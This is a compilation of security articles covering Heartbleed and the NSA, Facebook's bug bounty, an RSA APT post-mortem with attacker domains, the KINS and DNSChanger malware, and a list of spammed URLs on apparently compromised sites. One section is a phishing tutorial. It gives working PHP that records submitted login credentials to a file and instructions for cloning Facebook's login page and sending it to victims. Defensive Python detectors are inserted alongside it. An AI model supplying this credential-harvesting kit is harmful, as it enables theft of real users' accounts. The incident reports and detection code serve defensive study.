NSA knew about Heartbleed for two years

The critical “Heartbleed” bug reported earlier this week to have affected the security of most of the internet was discovered by researchers at the United States National Security Agency two years earlier, according to a new report.

On Friday afternoon, Bloomberg News journalist Michael Riley reported that the NSA knew about the monstrous flaw for at least two years ahead of this week’s announcement, but kept it hidden from technologists and instead exploited it to hack the computers and correspondence of certain intelligence targets.

Earlier in the week, the open-source OpenSSL internet security project issued an emergency advisory after discovery of the Heartbleed bug revealed a weakness that may have for years allowed hackers to access online information otherwise thought to be protected by the SSL/TLS encryption standard used by around two-thirds of the web.

But according to sources that Riley says are familiar with the matter, the NSA kept details of the bug a secret shortly after first discovering it in early 2012 so that it could be added to the agency’s toolbox of exploits and hacks.

“The agency found the Heartbeat glitch shortly after its introduction, according to one of the people familiar with the matter, and it became a basic part of the agency’s toolkit for stealing account passwords and other common tasks,” Riley wrote.

“Putting the Heartbleed bug in its arsenal, the NSA was able to obtain passwords and other basic data that are the building blocks of the sophisticated hacking operations at the core of its mission, but at a cost,” he added. “Millions of ordinary users were left vulnerable to attack from other nations’ intelligence arms and criminal hackers.”

Shortly after Bloomberg published their report, agency spokeswoman Vanee Vines told the National Journal that the NSA “was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private-sector cybersecurity report.”

“Reports that say otherwise are wrong,” she said, dismissing Riley’s report.

In December, a five-person review group handpicked by US President Barack Obama to reassess the NSA’s intelligence gathering abilities said that the government must not stockpile details about any so-called “zero day” vulnerabilities, or flaws unknown to computer programmers, who have thus had “zero days” to patch them.

“In almost all instances, for widely used code, it is in the national interest to eliminate software vulnerabilities rather than to use them for US intelligence collection,” the group told the president. “Eliminating the vulnerabilities — “patching” them — strengthens the security of US Government, critical infrastructure, and other computer systems.”

“We recommend that, when an urgent and significant national security priority can be addressed by the use of a Zero Day, an agency of the US Government may be authorized to use temporarily a Zero Day instead of immediately fixing the underlying vulnerability.”

Pres. Obama has since asked Congress to adhere to one of that group’s recommendations — halting the government’s bulk collection of telephony metadata — but has not publicly spoken of zero days before or after this week’s discovery of Heartbleed.

Previously, however, journalists and privacy advocates working with the trove of classified NSA documents disclosed last year by former contractor Edward Snowden said that the secretive intelligence agency had been undermining the very security of the internet by exploiting other flaws to hack targets.

At a security conference in December, expert Jacob Appelbaum from Germany’s Der Spiegel magazine said that the NSA had acquired the means to compromise any Apple iPhone in the world and occasionally relied on a number of high-tech tools and implants to hack targets.

“Basically the NSA, they want to be able to spy on you. And if they have ten different options for spying on you that you know about, they have 13 ways of doing it and they do all 13. So that’s a pretty scary thing,” said Appelbaum, who previously spoke on behalf of WikiLeaks at a US conference and is a core member of the Tor anonymity project.

And since June, NSA leaks disclosed by Mr. Snowden have shown that the NSA has done everything from physically tapping into fiber optic undersea internet cables to get further access to the world’s communications, to tricking the systems administrators of private companies into installing malware that would open up their machines to American spies.

Facebook pays bug hunters $1 million, India 2nd biggest recipient

India, which has over 78 million Facebook users, is second on the list of countries with the fastest-growing number of recipients of its Bug Bounty programme.(AP Photo)

Social networking giant Facebook said it has paid over $1 million in the past two years to security researchers who report bugs on its website, with India second among recipients by country.

India, which has over 78 million Facebook users, is also second on the list of countries with the fastest-growing number of recipients of its Bug Bounty programme.

 

A bug is an error or defect in software or hardware that causes a programme to malfunction. It often occurs due to conflicts in software when applications try to run in tandem.

While bugs can cause software to crash or produce unexpected results, certain defects can be used to gain unauthorised access to systems.

Facebook said it started the Bug Bounty programme a little more than two years ago to reward security researchers who report issues and to encourage people to help keep the site safe and secure.

“The programme has been even more successful than we’d anticipated,” Facebook said in a statement on its website.

“We’ve paid out more than $1 million in bounties and have collaborated with researchers from all around the world to stamp out bugs in our products and in our infrastructure,” said the statement. The social networking major said 329 people have received rewards, including professional researchers, students and part-timers. The youngest recipient was 13 years old.

A smartphone user shows the Facebook application on his phone in the central Bosnian town of Zenica.

“The countries with the most bounty recipients are, in order, the US, India, UK, Turkey, and Germany. The countries with the fastest-growing number of recipients are, in order, the US, India, Turkey, Israel, Canada, Germany, Pakistan, Egypt, Brazil, Sweden, and Russia,” it noted.

While the bug hunters are spread across 51 countries, 20% of the bounty paid so far have gone to US-based recipients, it added.

 

“Our Bug Bounty program allows us to harness the talent and perspective of people from all kinds of backgrounds, from all around the world,” Facebook security engineer Collin Greene said.

Two of the bounty recipients have taken up full-time jobs with the Facebook security team, he added.

 

Hack Facebook with Phishing: An old and awesome way to hack accounts.!!

What is Phishing:

According to Wikipedia, a phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term “phishing” was made in 1995. Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.

Phishing is an example of the social engineering techniques used to deceive users, and it exploits the poor usability of current web security technologies.

How they do Phishing:

So now I am going to show you how an attacker makes a phishing page and how they can get access to your social networking/e-mail account. Let me show you this demonstration on our favorite social networking site.

Step 1: First of all you need a free web hosting account which supports PHP. Hackers mostly use:

www.000webhost.com

www.my3gb.com

www.100gb.co

www.x10hosting.com

So first register on one of the above sites.

You will get a URL for your site.

Step 2: Now open www.facebook.com. If you are logged into your account, first log out of it or open the site in a different browser. Now press Ctrl+U, or right-click on this login page and click on View Source. Now copy all of this source code and paste it into a new Notepad file.

Step 3: Now save this Notepad file with the .html extension on your desktop or in any other folder you want. I am saving this file as index.html for this tutorial.

Step 4: Now open another Notepad file and paste the code below into it.

<?php
header('Location: http://www.facebook.com/');
$handler = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
exit;
?>

Now save this Notepad file with any name and the .php extension. I am saving this as phish.php for this tutorial. In this code there is a file name, ‘log.txt’; you can put any name there with the .txt extension, according to your choice.

Step 5: Now again open the index.html file with Notepad and find (Ctrl+F to find) the keyword ‘action’. You will find something like action=’http://www.facebook.com/*******’. Now remove the whole link after ‘=’ and put in the name of the PHP file you made before. I have used the name ‘phish.php’ for that file, so I will put this name after ‘=’. Now save this file again (Ctrl+S to save).

Step 6: Now upload both the index.html and phish.php files to your free hosting account.

Now all you have to do is send this link to the victim along with some social engineering.

When he clicks on the link you sent him, he will get the Facebook login screen, and when he logs in, you will get his username and password in a file named ‘log.txt’.
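From the defender’s side, the tell-tale sign of the cloned page built above is that its login form no longer posts to the site it imitates: the action has been rewritten to a script on the attacker’s free host. The following Python check is an added example (not code from this post); it parses a page, resolves every form action against the page URL, and reports any form that does not post over HTTPS to the expected domain. The host name example-free-host.test and both HTML snippets are constructed samples.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormActionCollector(HTMLParser):
    """Collect the resolved 'action' target of every <form> on a page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "form":
            return
        attr = dict(attrs)
        # A missing or empty action posts back to the page itself.
        action = attr.get("action") or self.page_url
        # Resolve relative targets (e.g. "phish.php") against the page URL.
        self.actions.append(urljoin(self.page_url, action))


def _host_allowed(host, expected_domain):
    host = host.lower()
    return host == expected_domain or host.endswith("." + expected_domain)


def find_offsite_form_posts(html, page_url, expected_domain):
    """Return the form targets on `html` that do not post to expected_domain.

    A login form on a page claiming to be `expected_domain` should post
    credentials over HTTPS to that domain.  A form whose action resolves
    to another host (or to plain http://) is the rewritten-action pattern
    used by the cloned page.
    """
    parser = FormActionCollector(page_url)
    parser.feed(html)
    findings = []
    for target in parser.actions:
        parts = urlsplit(target)
        host = parts.hostname or ""
        if parts.scheme != "https" or not _host_allowed(host, expected_domain):
            findings.append(target)
    return findings


# Constructed sample: the cloned login page on a free host, with the
# form action rewritten to the local credential logger "phish.php".
CLONED_PAGE = """
<html><body>
<form id="login_form" action="phish.php" method="post">
  <input name="email"><input name="pass" type="password">
</form>
</body></html>
"""

# Constructed sample: a form that posts back to the genuine domain.
GENUINE_PAGE = """
<html><body>
<form id="login_form" action="https://www.facebook.com/login.php" method="post">
  <input name="email"><input name="pass" type="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    cloned_url = "http://example-free-host.test/index.html"   # constructed
    print(find_offsite_form_posts(CLONED_PAGE, cloned_url, "facebook.com"))
    print(find_offsite_form_posts(GENUINE_PAGE, "https://www.facebook.com/", "facebook.com"))
```

The same check can be run on a suspicious link reported by a user before anyone enters credentials into it.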

Hope you liked it. Thanks. Please Share and Comment.

Anatomy of an Attack

I was on a tour in Asia Pacific when I first heard the news about the attack. The investigation into this attack continues but I’m eager to share some information with you about it.

Let’s first make sure everyone is on the same page. The number of enterprises hit by APTs grows by the month; and the range of APT targets includes just about every industry. Unofficial tallies number dozens of mega corporations attacked; examples are in the press regularly, and some examples are here, and here.

 

These companies deploy any imaginable combination of state-of-the-art perimeter and end-point security controls, and use all imaginable combinations of security operations and security controls. Yet still the determined attackers find their way in. What does that tell you?

The first thing actors like those behind the APT do is seek publicly available information about specific employees – social media sites are always a favorite.  With that in hand they then send that user a Spear Phishing email. Often the email uses target-relevant content; for instance, if you’re in the finance department, it may talk about some advice on regulatory controls.

The attacker in this case sent two different phishing emails over a two-day period. The two emails were sent to two small groups of employees; you wouldn’t consider these users particularly high profile or high value targets. The email subject line read “2011 Recruitment Plan.”

The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file. It was a spreadsheet titled “2011 Recruitment plan.xls.”

The spreadsheet contained a zero-day exploit that installs a backdoor through an Adobe Flash vulnerability (CVE-2011-0609). As a side note, by now Adobe has released a patch for the zero-day, so it can no longer be used to inject malware onto patched machines.

OK, back to the attack. As you know, the next step in a typical APT is to install some sort of a remote administration tool that allows the attacker to control the machine.  In our case the weapon of choice was a Poison Ivy variant set in a reverse-connect mode that makes it more difficult to detect, as the PC reaches out to the command and control rather than the other way around. Similar techniques were reported in many past APTs, including GhostNet.

Having set remote access, now the attacker in a typical APT starts digital shoulder surfing to establish the employee’s role and their level of access. If this isn’t sufficient for the attackers’ purpose, they will seek user accounts with better, more relevant, privileges. I’ve pieced together a separate blog post as an appendix, talking about the attack end-to-end and providing more data.

When it comes to APTs it is not about how good you are once inside, but that you use a totally new approach for entering the organization.  You don’t bother to just simply hack the organization and its infrastructure; you focus much more of your attention on hacking the employees.

One cannot stress enough the point about APTs being, first and foremost, a new attack doctrine built to circumvent the existing perimeter and endpoint defenses. It’s a little similar to stealth air fighters: for decades you’ve based your air defense on radar technology, but now you have those sneaky stealth fighters built with odd angles and strange composite materials.   You can try building bigger and better radars, or, as someone I talked to said, you can try staring more closely at your existing radars in hope of catching some faint signs of something flying by, but this isn’t going to turn the tide on stealthy attackers. Instead you have to think of a new defense doctrine.

Building a new defense doctrine takes time, but over the course of history many campaigns that required building a new defense doctrine were eventually won. The battle of the Atlantic is a good example. For years it was completely controlled by U-boat ‘Wolf Packs’, which were so effective in cutting Britain off from fuel and supplies that in early 1943 there was talk of stopping U.S. aid altogether.

But in mid 1943 the tide turned through a combination of smart leadership by newly appointed Admiral Horton of the Royal Navy, advancements in defensive technologies, as well as new tactics used by allied aircraft and escort ships. A new defense doctrine was born, and it worked like a charm.

And we don’t even have to go back that far. I still vividly remember the first Phishing attacks against online banks. IT security departments spent many long nights, trying to figure out what to do against sneaky attackers who didn’t bother at all with all the millions poured into securing the infrastructure, attacking instead the weakest element in the chain: the humans.

Recently the UK payment council announced that in 2010 online banking fraud declined 22%, despite phishing levels increasing 21%. This is turning the tide. It took the financial sector 7 years to build a new defense doctrine against social engineering attacks like Phishing and Trojans. I was part of this gargantuan effort, and I think we’ve learned a thing or two that can help us build a new defense doctrine against APTs much faster. Already we’re learning fast, and every organization hit by an APT is much more prepared against the next one; I’m confident it will take us far less than 7 years to say we’ve turned the tide on APTs.

Now let me point out a couple of additional points regarding the attack.

First, while RSA made it clear that certain information was extracted, it’s interesting to note that the attack was detected by its Computer Incident Response Team in progress; I’ve been talking to many CISOs in corporations that were hit by similar APTs and a lot of companies either detected the attacks after months, or didn’t detect them at all and learned about it from the government. This is not a trivial point: by detecting what is happening early on, RSA was able to respond quickly and engage in immediate countermeasures.

The other point I’d like to make is that the new defense doctrine is shaping up faster than I thought. We’re already working hard on introducing several completely new approaches; they map to some of the strategic directions I outlined in the end of the blog post here.

It is also important to note that just as stealth fighters evade radar instead of defeating it, APTs do not “defeat” security products. They just find ways to fly below the existing technology. Our incident response team and their technical array – a lot of it using RSA technologies – did enable us to identify the attack in progress and respond accordingly. That’s further proof that one key element is the people, not just the technology.

Well, guys, I think that’s all for now. I plan to write additional blogs in the coming days covering other aspects of the unfolding events, and as I mentioned there’s an appendix at the end of this blog with an end-to-end description of the attack.

I just want to leave you with one thought. What we’re witnessing now are the early days. We’re now in 1939, and U-boats are an impossible menace. We’re now in 2004, and social engineering attacks get away with our customer’s money. We’re now in 2011, and the tidal wave of targeted attacks has reached our shores.  It’s time to respond as an industry, define and execute a new defense doctrine based on information sharing, deep analytics and advanced threat management.

We’re headed into an interesting decade, but in the end I have confidence, the good guys will prevail.

Anatomy of an Attack (Appendix)

 

Before reading this, you should read the blog entitled ’Anatomy of an Attack’, which describes the attack on RSA at a high level. This post is an add-on, a sort of appendix really, that provides some end-to-end visibility into the various stages of the attack.

Advanced Persistent Threat attacks typically have three main phases. The first is the social engineering attack; that’s one of the key elements that differentiates an APT from good old hacking. From the very first mention of APTs it’s been clear that these attacks will be difficult to defend against, as they use a combination of social engineering with vulnerabilities in the end-point to access users’ PCs. Once inside you’re already in the network; you just have to find your way to the right users and systems, and carry on with “regular” hacking activities.

End-point security struggles with protecting against simpler forms of attack such as data stealing Trojans, which is why you can find so many examples of ZeusiLeaks, or employees compromised with a Trojan that grabs the corporate data and sends it to a Trojan mothership halfway across the world. If Trojans available for sale from every digital thug on the cyber block are getting through the perimeter, what should we expect when it comes to the more devious attacks that are currently launched against private sector companies?

The social engineering part is equally simple. Like I mentioned in a previous blog that focused on some long-term defense strategies against APTs, just think of what has changed in the past few decades. In the early 1980s you would have guys like Matthew Broderick in War Games, searching for modems connected to sensitive networks. Matthew mapped networks and found weak spots. His attacks had nothing to do with the users; he used weaknesses in the infrastructure. But if Matthew was staging an APT hack today, the first thing he’d do is visit social media sites. He’d collect intelligence on the organizations’ people, not infrastructure. Then he’d send a spear phishing email to the employees of interest.

In our case the attacker sent two different phishing emails over a two-day period. These emails were sent to two small groups of employees. When you look at the list of users that were targeted, you don’t see any glaring insights; nothing that spells high profile or high value targets.

The email subject line read “2011 Recruitment Plan”. This was intriguing enough for one of the employees to actually pull the email out of their Junk Box and double-click on the email attachment, which was an excel spreadsheet titled “2011 Recruitment plan.xls”.

The spreadsheet contained a zero-day exploit that installs a backdoor through an Adobe Flash vulnerability (CVE-2011-0609). Adobe has already released an emergency patch for the zero-day. The exploit injects malicious code into the employee’s PC, allowing full access into the machine. The attacker in this case installed a customized remote administration tool known as a Poison Ivy RAT variant; if you are familiar with APTs you will recognize Poison Ivy, as it has been used extensively in many other attacks, including GhostNet. Often these remote administration tools, the purpose of which is simply to allow external control of the PC or server, are set up in a reverse-connect mode: this means they pull commands from the central command & control servers, then execute the commands, rather than receiving commands pushed to them remotely. This connectivity method makes them more difficult to detect, as the PC reaches out to the command and control rather than the other way around. You’ll find references of Remote Administration tools here, including Poison Ivy – which you can also download yourself in pure form off the Internet.

The next phase of an APT is moving laterally inside the network once it’s compromised some of the employee PCs. The thing is, the initial entry points are not strategic enough for the attackers; they need users with more access, more admin rights to relevant services and servers, etc.

This is one of the key reasons why, having failed to prevent the initial social engineering phase, detecting it quickly is so important. In many of the APTs publicized in the last 18 months the attackers had months to do digital “shoulder surfing” on the attacked users, map the network and the resources, and start looking for a path to the coveted assets they desired. Then they use the compromised accounts, coupled with various other tactics, to gain access to more “strategic” users. In the RSA attack the timeline was shorter, but still there was time for the attacker to identify and gain access to more strategic users.

The attacker first harvested access credentials from the compromised users (user, domain admin, and service accounts). They performed privilege escalation on non-administrative users in the targeted systems, and then moved on to gain access to key high value targets, which included process experts and IT and Non-IT specific server administrators.

If the attacker thinks they can exist in the environment without being detected, they may continue in a stealth mode for a long while. If they think they run the risk of being detected, however, they move much faster and complete the third, and most “noisy”, stage of the attack. Since RSA detected this attack in progress, it is likely the attacker had to move very quickly to accomplish anything in this phase.

In the third stage of an APT, the goal is to extract what you can. The attacker in the RSA case established access to staging servers at key aggregation points; this was done to get ready for extraction. Then they went into the servers of interest, removed data and moved it to internal staging servers where the data was aggregated, compressed and encrypted for extraction.

The attacker then used FTP to transfer many password protected RAR files from the RSA file server to an outside staging server at an external, compromised machine at a hosting provider. The files were subsequently pulled by the attacker and removed from the external compromised host to remove any traces of the attack.

I hope this description provides information that can be used to understand what has happened and correlate with other APTs.  In addition three URLs associated with this attacker are:

Good[DOT]mincesur[DOT]com | up82673[DOT]hopto[DOT]org | www[DOT]cz88[DOT]net
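As an added defender-side example (not part of the original post), the following Python refangs the three indicator domains listed above and scans log lines for two of the patterns this appendix describes: contact with a known attacker domain, and FTP transfer of a RAR archive from an internal host to an external one, the exfiltration step of the third stage. The log line format, the internal address ranges and every sample line are constructed assumptions, not data from the RSA incident.

```python
import ipaddress
import re

# Indicators as listed in the appendix, in their defanged form.
DEFANGED_INDICATORS = [
    "Good[DOT]mincesur[DOT]com",
    "up82673[DOT]hopto[DOT]org",
    "www[DOT]cz88[DOT]net",
]

# Address space treated as internal for this example (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def refang(indicator):
    """Turn 'www[DOT]cz88[DOT]net' into 'www.cz88.net' (lower-cased)."""
    return re.sub(r"\[(?:dot|\.)\]", ".", indicator, flags=re.IGNORECASE).lower()


def is_internal(ip):
    """True when `ip` parses as an address inside INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False          # a host name, not an address
    return any(addr in net for net in INTERNAL_NETS)


# Constructed log format (assumption): "<ts> <src_ip> <proto> <dst> <detail>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<proto>\S+) (?P<dst>\S+) (?P<detail>.*)$")


def scan_log(lines, indicators=DEFANGED_INDICATORS):
    """Return (reason, line) tuples for lines matching either pattern.

    1. Any traffic whose destination is a listed attacker domain or a
       subdomain of one.
    2. FTP from an internal address to an external one carrying a .rar
       file, the staging-then-exfiltration pattern described above.
    """
    bad_domains = {refang(i) for i in indicators}
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        dst = m.group("dst").lower()
        if any(dst == d or dst.endswith("." + d) for d in bad_domains):
            hits.append(("known-c2-domain", line))
            continue
        if (m.group("proto").upper() == "FTP"
                and is_internal(m.group("src"))
                and not is_internal(m.group("dst"))
                and re.search(r"\.rar\b", m.group("detail"), re.IGNORECASE)):
            hits.append(("external-ftp-rar-transfer", line))
    return hits


# Constructed sample log: one DNS lookup of an indicator, an internal
# FTP copy to a staging server (not flagged), then the outbound transfer.
SAMPLE_LOG = [
    "2011-03-15T10:01:02Z 10.1.2.3 DNS good.mincesur.com A-query",
    "2011-03-15T10:02:10Z 10.1.2.3 HTTPS www.example.org GET /",
    "2011-03-15T10:05:44Z 10.1.2.3 FTP 10.1.9.9 STOR staging1.rar",
    "2011-03-15T10:06:01Z 10.1.9.9 FTP 198.51.100.7 STOR part01.rar",
    "2011-03-15T10:06:30Z 10.1.2.3 HTTP UP82673.hopto.org POST /",
]

if __name__ == "__main__":
    for reason, line in scan_log(SAMPLE_LOG):
        print(reason, "|", line)
```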

Perhaps this incident can be used as an exercise when you look at your own infrastructure and wonder what mitigation options you have against similar attacks.  I gave my thoughts on the matter in the main blog post, and can summarize them like this: there’s a reason why APTs are so dangerous, and it has to tell us something. As an industry, we have to act fast and develop a new defense doctrine; the happy days of good old hacking are gone, and gone too are the old defense paradigms. New threats call for new strategies.

At RSA we’re already learning fast, making both small-term hardening moves and giant strides towards establishing a whole new defense doctrine. We’re implementing techniques that just a couple of weeks ago I thought were in the realm of long-term roadmaps.

There are so many historic examples of campaigns that seemed hopeless at the time but were then turned through sheer will, creativity and leadership; I’m sure that in a few years, Advanced Persistent Threats will become a familiar, almost mainstream form of attack and that we’ll be able to deploy effective defenses against those who want to spy on and control our intellectual property, digital assets and critical infrastructure.

What is in a Name: Information Security Intelligence

One of the more elusive concepts in information security is that of information security intelligence.  Oftentimes when discussing intelligence, images of shadowy figures conducting espionage are evoked, and the truth of the matter is that often this is not far from the truth.  Information security intelligence means many things to many people, yet no one can argue against the value that it provides.  When discussing information security intelligence we need to ask ourselves what it is and how we can apply it to our enterprise infrastructure in a way that is both meaningful and actionable.  However, before we get to the point of discussing the value that information security intelligence offers to enterprises, we need to be comfortable with a working definition of what information security intelligence is.

The word intelligence is derived from the Latin verb intelligere.  Intelligere is derived from inter-legere, which means to “pick out” or “discern”.  In the middle ages a variation of this verb, intellectus, became the term used for “understanding” or “comprehension”.  Intelligence provides us the ability to discern or comprehend information as it is presented to us from disparate sources.   Likewise, information security intelligence allows us to discern or comprehend information related to threats and vulnerabilities (logical or physical).  As a result, information security intelligence can be defined as the understanding of threats or possible threats.  With Blackhat USA only a few weeks away, I am sure we will be hearing more and more about the vital role that information security intelligence plays in our defensive measures.

Source: RSA

Haunted by the Ghosts of ZeuS & DNSChanger

One of the challenges in malware research is separating the truly novel innovations in malcoding from new nasties that merely include nominal or superficial tweaks. This dynamic holds true for both malware researchers and purveyors, albeit for different reasons. Researchers wish to avoid being labeled alarmist in calling special attention to what appears to be an emerging threat that turns out to be old news; the bad guys just want to avoid getting scammed into paying for an old malware kit dressed up as the new next big thing.

“Since December 2012, when the spokesperson of the Citadel team took the Trojan off the semi-open underground market, cyber criminals have been scrambling to find a replacement,” RSA’s Limor Kessem wrote. “In early February 2013, RSA fraud intelligence researchers began tracing hints about a new crimeware tool called ‘KINS’. At the time, the information about the Trojan was just a rumor, but in sporadic comments, fraudsters were associating a Trojan named KINS with the Citadel source code, looking for its developer in order to reach out to him and purchase KINS. The rumors were soon hushed and ties to Citadel were denied, mostly in what appeared as a case of fearful fraudsters who did not want to be denied the possibility to buy the next Trojan.”

But according to Fox-IT, a security research and consulting group based in The Netherlands, KINS has been used in private since at least December 2011 to attack financial institutions in Europe, specifically Germany and The Netherlands. Fox-IT says KINS is short for “Kasper Internet Non-Security,” which is likely the malware author’s not-so-subtle dig at the security suite offered by Russian antivirus maker Kaspersky.

Source: Fox-IT

In its own analysis of the banking Trojan malware, Fox-IT said KINS is fully based on the leaked ZeuS source code, and includes only minor additions. What’s more, Fox-IT notes, many of the users of KINS have already migrated to yet another ZeuS variant, suggesting that perhaps they were unsatisfied with the product and that it didn’t deliver as advertised.

“While the technical additions are interesting, they are far from ground breaking,” wrote Michael Sandee, principal security expert at Fox-IT. “With an array of fairly standard features, and relatively simple additions to the standard ZeuS, such as reporting of installed security product information, the malware platform does not bring anything really new. There are however some features of this malware, not aimed at the functionality for the person using it, but aimed at complicating malware analysis.”

OLD MALWARE, NEW PAINTJOB?

From the bad-guy perspective, this infighting over malware innovation is on display in a new malware offering that surfaced today on a semi-private forum: The seller is pitching a resurrected and modified version of the DNSChanger Trojan, a global contagion that once infected millions of PCs. The DNSChanger botnet, which hooked into infected systems quite deeply and spread to both Windows and Mac computers, was eradicated only by a worldwide, concerted digital quarantine and vaccination effort — combined with the arrest of its creators.

 

As its name suggests, DNSChanger works by hijacking the domain name system (DNS) server settings on a computer; these settings point to Internet servers that are responsible for translating human-friendly domain names like example.com into numeric Internet addresses that are easier for computers to understand. DNSChanger swapped out victims’ legitimate DNS server settings with the addresses of DNS servers controlled by the malware’s creators. Armed with that control, the defendants could redirect any part of the Web browsing session on an infected user’s computer.

The original DNSChanger was used to conduct click fraud and to steal advertising revenues. This new version, dubbed Trend DNSChanger Bot, also hijacks the host machine’s DNS settings, but with the purpose of extracting a ransomware payment from the victim. Ransomware locks the victim’s PC until he either pays the ransom or finds a way to remove the malware. Victims are instructed to pay the ransom by purchasing prepaid MoneyPak, PaySafe or Ukash cards, sold at everything from Walgreens to Wal-Mart. Victims are then told to send the attackers a 14-digit voucher code that allows the bad guys to redeem those vouchers for cash.

The author of Trend DNSChanger Bot claims his malware includes the best of its predecessor —  including a powerful rootkit designed to make the code difficult to detect and remove — as well as the blocking of any Internet traffic between the host machine and antivirus and security vendors. The twist, according to the author, is in how it seeks to monetize hacked PCs.

Ransomware is most often distributed via hacked or malicious sites that exploit browser vulnerabilities. Typically, these scams impersonate the Department of Homeland Security or the FBI (or the equivalent federal investigative authority in the victim’s country) and try to frighten people into paying fines to avoid prosecution for supposedly downloading child pornography and pirated content.

The maker of Trend DNSChanger Bot says his malware instead displays messaging that appears to come from the victim’s own Internet service provider, warning of illicit activity and demanding fines for alleged violations of the ISP’s terms of service.


“We made it so that it locks the [victim's browser] to display a page [that mimics] major and medium-sized ISPs in each country in which you work. Imagine a user…seeing a message that their computer is locked, with the logos of its Internet service provider, the name of the provider, and the city in which [the victim] lives. According to our tests, it is very scary and makes them pay.”

It’s not clear whether this purportedly new version of DNSChanger will be embraced by the underground, or indeed will ever come close to inflicting the damage done by its predecessor. For now, the underground community appears interested but skeptical. Several members of the fraud forum where this malware is being sold say it bears strong resemblance to a project announced to great fanfare in 2012, only to be abandoned by its author.

Interestingly, the author of this upstart DNSChanger clone says he was part of the team that coded the original DNSChanger malware, but allows that his innovations are essentially incremental and that parts of his malware first emerged in the above-mentioned KINS Trojan. “In fact, we are not the first who came up with this technology,” the malware author “Trend” wrote. “It was first used in the KINS Trojan. Our team worked on DNSChanger, which is known throughout the world. But this project is only the official version that appeared in 2007. So the technology itself is not new.”

Source: http://krebsonsecurity.com/2013/07/haunted-by-the-ghosts-of-zeus-dnschanger/


Spammed URLs for the Snowden, Ender, Obama, and Tree Campaigns

Each line below gives the campaign tag, the host, and the URL path that was spammed.

obama 198.251.67.11 /incumbency/index.html
obama 198.251.67.11 /philippine/index.html
obama 198.251.67.11 /stifles/index.html
snowden 198.251.67.11 /campaigners/index.html
snowden 198.251.67.11 /foxhole/index.html
snowden 198.251.67.11 /fracturing/index.html
snowden 198.251.67.11 /incumbency/index.html
tree 198.251.67.11 /nomadic/index.html
tree 198.251.67.11 /philippine/index.html
tree 198.251.67.11 /reprehended/index.html
tree 198.251.67.11 /sauciness/index.html
tree 198.251.67.11 /sonya/index.html
snowden 198.251.67.11 /voodooing/index.html
ender 198.61.134.93 /decompressed/index.html
ender 198.61.134.93 /dinosaur/index.html
ender 198.61.134.93 /microeconomics/index.html
ender 198.61.134.93 /packard/index.html
ender 198.61.134.93 /reprimanding/index.html
ender 198.61.134.93 /sash/index.html
ender 51956147.de.strato-hosting.eu /radicalism/index.html
ender 51956147.de.strato-hosting.eu /remote/index.html
ender 51956147.de.strato-hosting.eu /soyinka/index.html
obama 96.9.7.80 /draftier/index.html
tree 96.9.7.80 /coif/index.html
tree 96.9.7.80 /contentious/index.html
snowden 96.9.7.80 /imperiling/index.html
snowden 96.9.7.80 /implausibilities/index.html
tree 96.9.7.80 /slaloming/index.html
ender adeseye.me.pn /clunkier/index.html
ender adeseye.me.pn /incest/index.html
ender adeseye.me.pn /mischancing/index.html
ender adeseye.me.pn /rarest/index.html
ender adeseye.me.pn /uglies/index.html
ender andywinnie.com /albert/index.html
ender andywinnie.com /anywheres/index.html
ender andywinnie.com /chairing/index.html
ender andywinnie.com /fits/index.html
ender andywinnie.com /network/index.html
ender andywinnie.com /preservation/index.html
ender aptword.com.my /dromedaries/index.html
ender aptword.com.my /incurred/index.html
ender aptword.com.my /interpol/index.html
ender aptword.com.my /translations/index.html
ender aptword.com.my /vietminh/index.html
obama assuredpropertycare.net /overlying/index.html
obama assuredpropertycare.net /sneezes/index.html
tree assuredpropertycare.net /arrhenius/index.html
snowden assuredpropertycare.net /changed/index.html
snowden assuredpropertycare.net /debaucheries/index.html
snowden assuredpropertycare.net /dulls/index.html
tree assuredpropertycare.net /dulls/index.html
snowden assuredpropertycare.net /overlying/index.html
tree assuredpropertycare.net /premeditation/index.html
tree assuredpropertycare.net /shekels/index.html
snowden assuredpropertycare.net /sneezes/index.html
obama bbsmfg.biz /belaying/index.html
obama bbsmfg.biz /lather/index.html
tree bbsmfg.biz /activists/index.html
snowden bbsmfg.biz /intellectualize/index.html
snowden bbsmfg.biz /lather/index.html
tree bbsmfg.biz /servo/index.html
tree bbsmfg.biz /skiing/index.html
tree bbsmfg.biz /tourist/index.html
ender bestpaintinginc.org /candidacy/index.html
ender bestpaintinginc.org /enmeshes/index.html
ender bestpaintinginc.org /genitives/index.html
ender bestpaintinginc.org /hardly/index.html
ender bestpaintinginc.org /parser/index.html
obama bordihn.net /rubik/index.html
snowden bordihn.net /gnarl/index.html
tree bordihn.net /gnarl/index.html
tree bordihn.net /gushing/index.html
tree bordihn.net /reformulates/index.html
snowden bordihn.net /squirreling/index.html
tree bordihn.net /squirreling/index.html
ender chad.westhostsite.com /addle/index.html
ender chad.westhostsite.com /augmenting/index.html
ender chad.westhostsite.com /buttonholes/index.html
ender chad.westhostsite.com /expend/index.html
ender chad.westhostsite.com /shillings/index.html
ender chad.westhostsite.com /unfailing/index.html
ender CHALONE.COM.SG /ebbed/index.html
ender CHALONE.COM.SG /homy/index.html
ender CHALONE.COM.SG /saddling/index.html
obama deerstalkersbop.org.nz /evelyn/index.html
snowden deerstalkersbop.org.nz /absconding/index.html
tree deerstalkersbop.org.nz /actioning/index.html
tree deerstalkersbop.org.nz /bathroom/index.html
snowden deerstalkersbop.org.nz /dissatisfied/index.html
tree deerstalkersbop.org.nz /dissatisfied/index.html
